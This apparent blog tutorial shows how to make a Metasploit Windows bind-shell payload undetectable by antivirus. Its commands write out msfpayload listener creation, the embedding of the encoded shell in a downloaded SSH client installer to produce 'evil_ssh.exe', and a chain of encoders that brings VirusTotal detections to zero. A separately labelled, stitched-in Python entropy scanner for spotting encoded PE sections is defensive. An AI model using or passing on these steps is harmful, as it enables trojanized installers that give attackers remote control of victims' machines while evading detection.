How To Bypass EXE File’s Antivirus Detection Using Metasploit (FUD)


In this tutorial we will show you, step by step, how to make an executable Fully Undetectable (FUD) by antivirus engines. There are many approaches; here we will look at how to make an executable FUD using msfencode.

Requirements: Metasploit (included in BackTrack and Kali)


Attention
We are using some harmless test files but don’t infect people with any real viruses. That would be a crime.

Purpose

Antivirus protects machines from malware, but not from all of it. There are ways to pack malware so that it is harder to detect. We'll use Metasploit to make a detected executable effectively invisible to antivirus engines.

Creating a Listener

This is a simple payload that gives the attacker remote control of a machine. It is not a virus and won't spread, but it is detected by antivirus engines. In BackTrack, in a Terminal window, execute these commands:
cd
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe
You should see the listen.exe file as shown below:

Analyzing the Listener with VirusTotal

Open the VirusTotal web page and click the “Choose File” button. Navigate to /root and double-click listen.exe; “listen.exe” appears in the “Choose File” box, as shown below:
Click the “Scan it” button.
If you see a “File already analyzed” message, click the “View last analysis” button.
The analysis shows that many of the antivirus engines detected the file: 33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.

Encoding the Listener

This process encodes the listener and inserts it into an innocent SSH client installer, which serves as the template.
In BackTrack/Kali, in a Terminal window, execute these commands:
wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exe
msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1
ls -l evil*
Here -i and -o name the input and output files, -t exe selects the output format, -x supplies the SSH installer as the template, -k keeps the template's own code working and runs the payload in a separate thread, -e selects the encoder, and -c sets the number of encoding iterations.

You should see the evil_ssh.exe file as shown below:
Scan it with VirusTotal as before.
If you see a “File already analyzed” message, click the “View last analysis” button.
The analysis shows that fewer of the antivirus engines detect the file now: 21 out of 42, when I did it, as shown below. You may see different numbers.
Encoding the Listener Again

This process will encode the listener with several different encoders in sequence.
In BackTrack/Kali, in a Terminal window, execute these commands:
msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1
msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1
ls -l listen*
You should see several files as shown below:

Analyzing Again

The analysis shows that fewer of the antivirus engines detect the file now: 0 out of 42, when I did it, as shown below. You may see different numbers.
You are done.
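As a defender-side check to go with the encoding steps above, here is an added example (not from the original post and not part of Metasploit) that parses a PE file's section table using only the Python standard library and flags sections whose byte entropy is high, the footprint an encoder such as shikata_ga_nai tends to leave when its output is dropped into an otherwise ordinary installer. The PE image, the section names `.text` and `.enc`, and the 7.0 bits-per-byte threshold are constructed for the example and are not taken from the post.

```python
import math, random, struct

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, up to 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def pe_sections(image: bytes):
    """Yield (name, raw bytes) for each section of a PE image; minimal stdlib-only parser."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe_off = struct.unpack_from("<I", image, 0x3C)[0]            # e_lfanew
    if image[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    n_sections = struct.unpack_from("<H", image, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", image, pe_off + 20)[0]    # SizeOfOptionalHeader
    table = pe_off + 24 + opt_size                               # first IMAGE_SECTION_HEADER
    for i in range(n_sections):
        hdr = image[table + 40 * i:table + 40 * (i + 1)]
        name = hdr[:8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", hdr, 16)    # SizeOfRawData, PointerToRawData
        yield name, image[raw_ptr:raw_ptr + raw_size]

def suspicious_sections(image: bytes, threshold: float = 7.0) -> list:
    """Names of sections whose entropy exceeds the threshold (where encoded/packed code lands)."""
    return [name for name, data in pe_sections(image) if shannon_entropy(data) > threshold]

def build_test_pe(sections) -> bytes:
    """Construct a minimal, non-runnable PE image from (name, data) pairs, for testing only."""
    pe_off, n = 0x40, len(sections)
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", pe_off)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, 0, 0)   # i386, no optional header
    headers, body, data_start = b"", b"", pe_off + 24 + 40 * n
    for name, data in sections:
        headers += name.ljust(8, b"\0") + struct.pack("<IIII", len(data), 0, len(data), data_start + len(body)) + b"\0" * 16
        body += data
    return dos + coff + headers + body

# Constructed sample: code-like repeating bytes (as in a normal installer) plus one section of
# pseudo-random bytes standing in for an encoded payload. Names and threshold are assumptions.
_rng = random.Random(1234)
SAMPLE_PE = build_test_pe([
    (b".text", b"\x55\x8b\xec" * 400),                         # push ebp; mov ebp, esp
    (b".enc", bytes(_rng.randrange(256) for _ in range(4096))),
])
```

Run `suspicious_sections(open(path, "rb").read())` against a real file to get the list of high-entropy sections; treat it as a triage signal rather than a verdict, since compressed resources and legitimately packed installers also score high.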


One thought on “How To Bypass EXE File’s Antivirus Detection Using Metasploit (FUD)”

  1. After following the procedure and running the file on Windows x64, an error occurred: "This version of this file is not compatible with the version of Windows you're running. Check your computer's system information to see whether you need an x86 (32-bit) or x64 (64-bit) version of the program."
